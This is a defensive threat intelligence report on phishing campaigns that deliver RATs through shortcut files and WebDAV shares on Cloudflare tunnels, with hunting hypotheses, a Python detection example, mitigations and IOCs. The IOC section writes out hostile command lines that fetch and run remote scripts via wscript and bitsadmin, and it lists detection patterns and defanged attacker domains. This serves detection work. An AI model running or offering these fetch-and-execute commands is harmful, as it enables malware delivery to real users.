
Abusing Windows File Explorer and WebDAV for Malware Delivery

Threat actors are leveraging WebDAV and Windows File Explorer to deliver Remote Access Trojans (RATs) while bypassing traditional web browser security controls. By utilizing .url and .lnk shortcut files pointing to WebDAV servers hosted on temporary Cloudflare Tunnels, attackers can trick users into executing malicious scripts that appear as local files.

Sens: Immediate | Conf: high | Analyzed: 2026-03-02

Authors: Kahng An, Cofense Intelligence Team

Actors: XWorm RAT, Async RAT, DcRAT

Source: Cofense


Key Takeaways

  • Threat actors are abusing WebDAV via Windows File Explorer to bypass web browser security controls and deliver malware.
  • Campaigns heavily utilize free Cloudflare Tunnel demo instances (trycloudflare.com) to host malicious WebDAV servers.
  • Attackers use .url and .lnk shortcut files to initiate WebDAV connections or execute remote scripts.
  • URL shortcut files containing UNC paths can trigger automatic DNS lookups and outbound connections simply by opening the directory in File Explorer.
  • Final payloads are typically Remote Access Trojans (RATs) such as XWorm, Async RAT, and DcRAT.

Affected Systems

  • Windows
  • Windows File Explorer

Attack Chain

The attack begins with the delivery of a phishing email, often themed around finance or invoices, containing a .url or .lnk shortcut file. When the user interacts with the shortcut (or simply views the directory containing a UNC-pathed .url file), a connection is made to a remote WebDAV server hosted on a Cloudflare Tunnel. The shortcut executes built-in Windows tools like wscript.exe or cmd.exe to download and run malicious scripts (e.g., .wsh, .bat) from the WebDAV share. These scripts ultimately deploy Remote Access Trojans (RATs) such as XWorm, Async RAT, or DcRAT onto the victim's machine.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide specific detection rules but recommends behavioral EDR monitoring for .url and .lnk files executing remote commands.

Detection Engineering Assessment

  • EDR Visibility: High. EDR solutions can easily monitor process creation events (such as wscript.exe or cmd.exe) and command-line arguments containing suspicious UNC paths or WebDAV keywords.
  • Network Visibility: Medium. While the network traffic is routed through legitimate Cloudflare infrastructure (often over HTTPS), DNS queries to trycloudflare.com and outbound WebDAV/SMB connections to external IPs are visible.
  • Detection Difficulty: Moderate. Detecting this requires distinguishing malicious WebDAV connections from legitimate enterprise file share activity, though the use of trycloudflare.com and script execution from WebDAV shares provides strong signals.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon 1)
  • Network Connections (Sysmon 3)
  • DNS Queries (Sysmon 22)

Hunting Hypotheses

  • Hypothesis: Look for wscript.exe or cscript.exe executing files directly from UNC paths containing '@SSL' or 'DavWWWRoot'. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: Monitor for cmd.exe utilizing bitsadmin.exe to download files from trycloudflare.com domains. | Telemetry: Process Creation | ATT&CK Stage: Command and Control / Execution | FP Risk: Low
  • Hypothesis: Identify .url or .lnk files triggering outbound network connections to external IP addresses over port 80 or 443. | Telemetry: Network Connections | ATT&CK Stage: Execution | FP Risk: Medium

Control Gaps

  • Browser-based download protections (SmartScreen, Safe Browsing) are bypassed because Windows File Explorer handles the connection directly.

Key Behavioral Indicators

  • wscript.exe executing .wsh files from WebDAV shares
  • UNC paths containing 'DavWWWRoot'
  • DNS queries to trycloudflare.com originating from explorer.exe
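
The hunting hypotheses and behavioral indicators above expressed as runnable detection logic over constructed Sysmon-style events (an added example, not code from the Cofense report): the first two hypotheses run against Event ID 1 process creation records, the explorer.exe DNS indicator against Event ID 22 records, and each hit carries the remote host as an investigation pivot. The event field names, the sample events and the placeholder tunnel hostname are assumptions made for this example.

```python
import re
# Constructed Sysmon-style events (not from the report). "id" is the Sysmon Event ID:
# 1 = process creation, 22 = DNS query. The tunnel hostname is a placeholder, not an IOC.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "\\placeholder-tunnel.trycloudflare.com@SSL\DavWWWRoot\dat.wsh"'},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c bitsadmin /transfer job https://placeholder-tunnel.trycloudflare.com/rec.wsh"
                r" %TEMP%\rec.wsh & wscript %TEMP%\rec.wsh"},
    {"id": 22, "image": r"C:\Windows\explorer.exe", "query": "placeholder-tunnel.trycloudflare.com"},
    # Benign controls: a local logon script and a browser resolving cloudflare.com itself.
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe", "cmdline": r'wscript.exe "C:\Scripts\logon.vbs"'},
    {"id": 22, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "query": "www.cloudflare.com"},
]

# Host part of a UNC path (\\host@SSL\DavWWWRoot\..., \\host@SSL@443\...) or of an http(s) URL.
REMOTE_HOST = re.compile(r'(?:\\\\|https?://)([^\\/\s"]+)')

def remote_host(cmdline):
    """Server name from the first UNC path or URL in cmdline (strips @SSL/@port), or None."""
    m = REMOTE_HOST.search(cmdline)
    return m.group(1).split("@")[0].lower() if m else None

def rule_script_host_from_webdav(ev):
    """Hypothesis 1: wscript/cscript launched with a UNC path containing @SSL or DavWWWRoot."""
    if ev["id"] != 1 or not ev["image"].lower().endswith(("wscript.exe", "cscript.exe")):
        return False
    cmd = ev["cmdline"].lower()
    return "\\\\" in cmd and ("@ssl" in cmd or "davwwwroot" in cmd)

def rule_bitsadmin_trycloudflare(ev):
    """Hypothesis 2: cmd.exe driving bitsadmin to fetch from a trycloudflare.com host."""
    if ev["id"] != 1 or not ev["image"].lower().endswith("cmd.exe"):
        return False
    cmd = ev["cmdline"].lower()
    return "bitsadmin" in cmd and ".trycloudflare.com" in cmd

def rule_explorer_dns_trycloudflare(ev):
    """Behavioral indicator: explorer.exe itself resolving a trycloudflare.com name (UNC .url viewed)."""
    return (ev["id"] == 22 and ev["image"].lower().endswith("explorer.exe")
            and ev["query"].lower().endswith(".trycloudflare.com"))

RULES = (rule_script_host_from_webdav, rule_bitsadmin_trycloudflare, rule_explorer_dns_trycloudflare)

def hunt(events):
    """Apply every rule to every event; each hit names the rule, the event index and the remote host."""
    hits = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            if rule(ev):
                host = ev.get("query") or remote_host(ev["cmdline"])
                hits.append({"rule": rule.__name__, "event": idx, "host": host})
    return hits
```

Running `hunt(SAMPLE_EVENTS)` flags the three malicious records and leaves both benign controls untouched; in production the same predicates map directly onto EDR or SIEM queries over Sysmon 1 and 22.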

False Positive Assessment

  • Medium (Legitimate enterprise use of WebDAV, SMB, or Cloudflare Tunnels may trigger alerts, though the specific combination of .url/.lnk executing scripts from trycloudflare.com is highly suspicious).

Recommendations

Immediate Mitigation

  • Block or monitor DNS requests to trycloudflare.com if not required for business operations.
  • Investigate endpoints showing recent connections to WebDAV shares hosted on Cloudflare Tunnels.

Infrastructure Hardening

  • Disable the WebDAV client service (WebClient) on Windows endpoints if not actively used.
  • Restrict outbound SMB and WebDAV traffic to external IP addresses at the perimeter firewall.

User Protection

  • Configure EDR to block or alert on .url and .lnk files executing scripts from remote network shares.
  • Ensure Windows 'Open File - Security Warning' prompts are enabled and not suppressed via GPO.

Security Awareness

  • Educate users to verify the address bar in Windows File Explorer to ensure they are not accessing unfamiliar remote servers.
  • Train employees to recognize the risks of opening shortcut files (.url, .lnk) received via email.

MITRE ATT&CK Mapping

  • T1059.003 - Command and Scripting Interpreter: Windows Command Shell
  • T1059.005 - Command and Scripting Interpreter: Visual Basic
  • T1105 - Ingress Tool Transfer
  • T1204.001 - User Execution: Malicious Link
  • T1204.002 - User Execution: Malicious File
  • T1573 - Encrypted Channel

Additional IOCs

  • Domains:
    • everything-teach-pearl-eat[.]trycloudflare[.]com - Cloudflare Tunnel domain used for WebDAV malware delivery.
    • tiny-fixtures-glossary-advantage[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 374884.
    • nasdaq-aged-sf-cheers[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 377161.
    • lose-croatia-acdbentity-lt[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 377161.
    • discounted-pressed-lc-vcr[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 376309.
    • skills-statute-alberta-demand[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 376309.
    • whats-menu-familiar-zshops[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 386717.
    • publicity-jenny-paintball-gilbert[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 386717.
  • File Paths:
    • po.wsh - Malicious Windows Script Host file hosted on WebDAV server.
    • dat.wsh - Malicious Windows Script Host file executed via LNK shortcut.
    • rec.wsh - Malicious Windows Script Host file downloaded via bitsadmin.
    • iri.bat - Malicious batch script hosted on WebDAV server.
    • po##.wsh - Malicious Windows Script Host file hosted on WebDAV server.
    • roi.wsf - Malicious Windows Script File hosted on WebDAV server.
  • Command Lines:
    • Purpose: Executes a remote Windows Script Host file directly from a WebDAV share using a UNC path. | Tools: wscript.exe | Stage: Execution | wscript.exe "\\<domain>@SSL\DavWWWRoot\dat.wsh"
    • Purpose: Downloads a malicious script from a remote server using bitsadmin and executes it via wscript. | Tools: cmd.exe, bitsadmin.exe, wscript.exe | Stage: Execution/Download | cmd.exe /c bitsadmin /transfer job <url> %TEMP%\rec.wsh &wscript%TEMP%\rec.wsh